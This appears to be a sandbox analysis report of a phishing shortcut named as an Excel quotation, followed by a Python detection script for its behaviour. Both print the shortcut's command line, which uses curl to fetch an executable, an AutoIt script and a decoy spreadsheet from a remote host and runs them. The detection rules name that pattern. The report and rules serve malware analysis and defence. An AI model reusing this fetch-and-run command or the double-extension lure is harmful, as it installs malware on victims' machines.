Analysis

max time kernel: 119s
max time network: 123s
platform: windows7_x64
resource: win7-20230831-en
resource tags: arch:x64, arch:x86, image:win7-20230831-en, locale:en-us, os:windows7-x64, system
submitted: 29/09/2023, 06:27

Static task: static1
Behavioral task: behavioral1
Sample: Cosmetic product_list_2023_Quatation.Approved.by.CEO.xls.lnk
Resource: win7-20230831-en
2 signatures
150 seconds
General

Target: Cosmetic product_list_2023_Quatation.Approved.by.CEO.xls.lnk
Size: 2KB
MD5: f9c403c1c4b55521d5cb06bf5232ca0e
SHA1: 6f2cd23f0c816475dcbdbc60039c0aa7252a98fd
SHA256: 716d31755f09d102d83a35276c9c6422c490757eb7c62f9e39a3263ba6057267
SHA512: 4efcf9f6bf488295c3be1fcf819e618417d86d68125e2bb5d5ac86a8bdcc46d39b0da4276fac787e1881e4d228d64dd4e4bc7dd17dda34351196a59889d28af5
Score: 3/10
Malware Config

Signatures

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Suspicious use of WriteProcessMemory (3 IoCs)
description                        pid   Process  procid_target
PID 2832 wrote to memory of 2468   2832  cmd.exe  29
PID 2832 wrote to memory of 2468   2832  cmd.exe  29
PID 2832 wrote to memory of 2468   2832  cmd.exe  29
(the same parent/child pair, recorded three times)
Processes

1. C:\Windows\system32\cmd.exe
   cmd /c "C:\Users\Admin\AppData\Local\Temp\Cosmetic product_list_2023_Quatation.Approved.by.CEO.xls.lnk"
   PID: 2832
   Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k curl -# -o "C:\Users\Admin\AppData\Local\Temp\authorizer.exe" "vntricker.abcxzy.com:2351" -o "C:\Users\Admin\AppData\Local\Temp\authorizer.au3" "vntricker.abcxzy.com:2351/msiucwjhslv" -o "C:\Users\Admin\AppData\Local\Temp\Cosmetic product_list_2023_Quatation.Approved.by.CEO.xlsx" "vntricker.abcxzy.com:2351/decucwjhslv" && "C:\Users\Admin\AppData\Local\Temp\Cosmetic product_list_2023_Quatation.Approved.by.CEO.xlsx" && "C:\Users\Admin\AppData\Local\Temp\authorizer.exe" "C:\Users\Admin\AppData\Local\Temp\authorizer.au3"
      PID: 2468

What the shortcut does, read from the command line of PID 2468: the .lnk target is cmd.exe /k (the console stays open after the command), which runs a single curl invocation with three "-o <file> <url>" pairs, each writing one download into the user's Temp directory: authorizer.exe from vntricker.abcxzy.com:2351, authorizer.au3 from /msiucwjhslv, and a Cosmetic product_list_2023_Quatation.Approved.by.CEO.xlsx from /decucwjhslv. The URLs carry no scheme, so curl defaults to plain HTTP on the non-standard port 2351. The && chain then opens the downloaded .xlsx (a decoy named after the shortcut) and runs authorizer.exe with authorizer.au3 as its argument. .au3 is the AutoIt script extension; what authorizer.exe actually is cannot be determined from this report, since the downloaded files are not part of it.

Caveat: apart from these two cmd.exe instances no process appears in the tree and no network indicators are listed, so the report does not show the downloads completing or the decoy/.au3 stage executing. The 3/10 score and the two signatures cover only that observed behaviour; the static indicators (the double extension .xls.lnk, curl to a bare host:port, an .au3 handed to an .exe in Temp) are the useful hunting material here.
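Detection logic for the chain shown in the process tree, as an added example that is not part of this report. It runs string-level rules over process-creation records: a double-extension .lnk launched by cmd.exe, curl dropping executables into Temp from scheme-less or non-standard-port URLs, and an .exe being handed an .au3 script. The two command lines in the sample records are copied from the tree above; the third record (a benign https download), the Sysmon-style field names, the rule names and the extension list are my assumptions.

```python
"""Detection rules for the cmd.exe -> curl -> .exe + .au3 chain seen above.

Added example, not part of the sandbox report. The first two command lines are
copied from the report's process tree; the third record is a constructed benign
control. Field names imitate Sysmon Event ID 1 (ProcessCreate).
"""
import ntpath
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

SAMPLE_EVENTS = [
    {   # PID 2832 from the report: the shortcut being launched
        "ProcessId": 2832,
        "Image": r"C:\Windows\system32\cmd.exe",
        "CommandLine": r'cmd /c "C:\Users\Admin\AppData\Local\Temp\Cosmetic product_list_2023_Quatation.Approved.by.CEO.xls.lnk"',
    },
    {   # PID 2468 from the report: the shortcut's target command line
        "ProcessId": 2468,
        "ParentProcessId": 2832,
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'"C:\Windows\System32\cmd.exe" /k curl -# -o "C:\Users\Admin\AppData\Local\Temp\authorizer.exe" "vntricker.abcxzy.com:2351" -o "C:\Users\Admin\AppData\Local\Temp\authorizer.au3" "vntricker.abcxzy.com:2351/msiucwjhslv" -o "C:\Users\Admin\AppData\Local\Temp\Cosmetic product_list_2023_Quatation.Approved.by.CEO.xlsx" "vntricker.abcxzy.com:2351/decucwjhslv" && "C:\Users\Admin\AppData\Local\Temp\Cosmetic product_list_2023_Quatation.Approved.by.CEO.xlsx" && "C:\Users\Admin\AppData\Local\Temp\authorizer.exe" "C:\Users\Admin\AppData\Local\Temp\authorizer.au3"',
    },
    {   # constructed benign control: an installer fetched over https into Downloads
        "ProcessId": 4100,
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'cmd /c curl -L -o "C:\Users\Admin\Downloads\tool.msi" "https://example.com/tool.msi"',
    },
]

# Document extension immediately followed by .lnk (e.g. ".xls.lnk").
DOUBLE_EXT_LNK = re.compile(r'\.(?:xlsx?|docx?|pptx?|pdf)\.lnk"?(?:\s|$)', re.I)
# curl "-o <output> <url>" pairs, quoted or bare.
CURL_OUT = re.compile(r'-o\s+(?:"([^"]+)"|(\S+))\s+(?:"([^"]+)"|(\S+))')
# Any executable invoked with an AutoIt script (.au3) as its argument.
AU3_EXEC = re.compile(r'"([^"]+\.exe)"\s+"([^"]+\.au3)"', re.I)
# Extensions that should not be curl'd into a user's Temp directory (assumed list).
DROPPED_EXTS = {".exe", ".dll", ".au3", ".scr", ".ps1", ".vbs", ".js"}
TEMP_MARKER = "\\appdata\\local\\temp\\"


@dataclass
class Finding:
    pid: int
    rules: list[str] = field(default_factory=list)
    downloads: list[tuple[str, str]] = field(default_factory=list)  # (url, output path)

    def add(self, rule: str) -> None:
        if rule not in self.rules:
            self.rules.append(rule)


def _port_of(url: str):
    """Port curl would connect to; scheme-less URLs get curl's http default."""
    try:
        return urlparse(url if "://" in url else "http://" + url).port
    except ValueError:
        return None


def analyze(event: dict) -> Finding:
    cmd = event["CommandLine"]
    f = Finding(pid=event["ProcessId"])
    if DOUBLE_EXT_LNK.search(cmd):
        f.add("lnk_double_extension")
    if re.search(r"\bcurl\b", cmd, re.I):
        for m in CURL_OUT.finditer(cmd):
            path = m.group(1) or m.group(2)
            url = m.group(3) or m.group(4)
            f.downloads.append((url, path))
            ext = ntpath.splitext(path)[1].lower()
            if ext in DROPPED_EXTS and TEMP_MARKER in path.lower():
                f.add("curl_drops_executable_to_temp")
            if "://" not in url:
                f.add("curl_scheme_less_url")  # curl falls back to plain http
            if _port_of(url) not in (None, 80, 443):
                f.add("curl_nonstandard_port")
    if AU3_EXEC.search(cmd):
        f.add("au3_script_execution")
    # Drop-then-run in one command line is the strongest signal here.
    if {"curl_drops_executable_to_temp", "au3_script_execution"} <= set(f.rules):
        f.add("curl_to_autoit_chain")
    return f


def scan(events) -> list[Finding]:
    """Return only the records that triggered at least one rule."""
    return [f for f in map(analyze, events) if f.rules]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding.pid, finding.rules, [u for u, _ in finding.downloads])
```

The rules are deliberately string-level so they can be ported to a SIEM query; a production detection would also require parent lineage (explorer.exe or cmd.exe launching a .lnk from a user-writable path) and tokenise the Windows command line properly rather than with regexes, since attackers can break these patterns with alternative quoting or curl's long-form options.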